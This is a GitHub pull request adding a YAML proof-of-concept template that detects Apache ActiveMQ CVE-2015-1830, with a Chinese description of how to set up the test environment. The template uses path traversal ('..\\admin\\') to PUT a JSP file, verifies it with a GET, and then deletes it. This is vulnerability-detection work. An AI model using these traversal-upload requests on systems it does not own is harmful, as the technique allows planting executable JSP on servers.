### PR TITLE
Create activemq-cve-2015-1830-traversal-upload.yml

### DIFF
--- a/pocs/activemq-cve-2015-1830-traversal-upload.yml
+++ b/pocs/activemq-cve-2015-1830-traversal-upload.yml
@@ -23,4 +23,4 @@ detail:
   Affected Version: Apache ActiveMQ 5.x before 5.11.2 for Windows
   links:
     - https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt
-    - https://github.com/QWERTYSKI/metaspoilt-framework/blob/master/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md
+    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md

--- a/pocs/activemq-cve-2015-1830-traversal-upload.yml
+++ b/pocs/activemq-cve-2015-1830-traversal-upload.yml
@@ -20,6 +20,7 @@ rules:
       response.status == 200
 detail:
   author: Jing Ling
+  Affected Version: Apache ActiveMQ 5.x before 5.11.2 for Windows
   links:
     - https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt
     - https://github.com/QWERTYSKI/metaspoilt-framework/blob/master/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md

--- a/pocs/activemq-cve-2015-1830-traversal-upload.yml
+++ b/pocs/activemq-cve-2015-1830-traversal-upload.yml
@@ -1,0 +1,25 @@
+name: poc-yaml-activemq-cve-2015-1830-traversal-upload
+set:
+  filename: randomLowercase(6)
+  fileContent: randomLowercase(6)
+rules:
+  - method: PUT
+    path: /fileserver/..\\admin\\{{filename}}.jsp
+    body: '<% out.println("{{fileContent}}");%>'
+    expression: |
+      response.status == 204
+  - method: GET
+    path: >-
+      /admin/{{filename}}.jsp
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(fileContent))
+  - method: DELETE
+    path: >-
+      /admin/{{filename}}.jsp
+    expression: |
+      response.status == 200
+detail:
+  author: Jing Ling
+  links:
+    - https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt
+    - https://github.com/QWERTYSKI/metaspoilt-framework/blob/master/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md


### PR DESCRIPTION
----------

## 本 poc 是检测什么漏洞的
检查Apache ActiveMQ for Windows 目录遍历漏洞及文件上传(cve-2015-1830)
## 测试环境
下载Apache ActiveMQ for Windows 5.11.1
https://www.exploit-db.com/apps/8822a635ae9423831895a16719aa1c60-apache-activemq-5.11.1-bin.zip
解压进入apache-activemq-5.11.1\bin\win64目录双击activemq.bat部署
## 备注
![image](https://user-images.githubusercontent.com/24275308/86750056-45e92980-c070-11ea-830f-9e9d2a3f8dd0.png)
